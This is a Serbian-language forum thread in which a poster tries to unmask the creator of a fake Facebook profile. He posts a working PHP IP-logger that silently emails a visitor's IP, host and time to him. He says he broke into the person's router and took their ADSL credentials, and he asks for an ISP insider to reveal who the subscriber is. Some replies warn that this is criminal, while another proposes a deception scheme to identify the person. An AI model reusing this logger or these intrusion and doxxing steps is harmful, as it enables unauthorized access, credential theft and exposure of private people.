[ DJ_DzoNe @ 11.01.2011. 21:16 ] @
Neko je napravio LAZAN profil drugaru koji cak ni nema kompijuter a kamo li facebook.
i pomocu skripte koju sam mu poslao na facebook da link da klikne
Citat:
<?
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ?
$_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];
$host = @gethostbyaddr($ip);
$date = date("d/m/Y H:i:s");
$email = "[email protected]";
$sujet = "Ip + Host";
$message = "<html><body>Moment : $date<br>Ip : $ip<br>Host : $host</body></html>";
if(mail($email,$sujet,$message,"Content-Type: text/html")){
echo "Slikeeeeee";}
else { echo "Sh*t ?";}
?>

dobijem IP i vreme, dal mogu da saznam od euneta koje to.

cak sam uspeo da se ulogujem u ruter te adrese i vidim da je up 63 dana i provalim iz rutera adsl username i pass za ADSL.

dal nekako mogu nekako da saznam od euneta lupam recite mi koje adsl.blabla@eunet user? (ovo bla bla je primer)
[ pri3rak @ 11.01.2011. 21:33 ] @
Moze se pribaviti sa sudskim nalogom, ali ako im budes rekao kako si nasao username i pass popices krivicnu prijavu
[ the_tosic @ 11.01.2011. 21:36 ] @
Mozes da prijavis lazni profil, verovatno bi morao da posaljes i sken licne karte ili pasosa.
[ DJ_DzoNe @ 11.01.2011. 21:38 ] @
ili neki insajder u eunetu i samo search i vidi ko je taj korisnik, ima li takvih odje x)
[ janko.84 @ 11.01.2011. 21:46 ] @
Forum: Advocacy

Ovo je opis foruma u kome trenutno pišete poruku. Molimo Vas da ga pročitate i proverite da li Vaša poruka zaista ima veze sa temom "Advocacy" foruma! Hvala.
Open Source vs. Closed Source, GPL vs. Proprietary Licensing, Windows vs. Unix clones... Prednosti i mane nekog IT proizvoda/usluge i upoređivanje sa konkurentima na tržištu

[ Wi-Fi @ 11.01.2011. 22:23 ] @
^^Zar nije jednostavnije da nagovorite neku drugaricu da pocne da chat-uje sa doticnim likom, prvo preko FB-a a onda i preko telefona/uzivo i tako provalite ko je?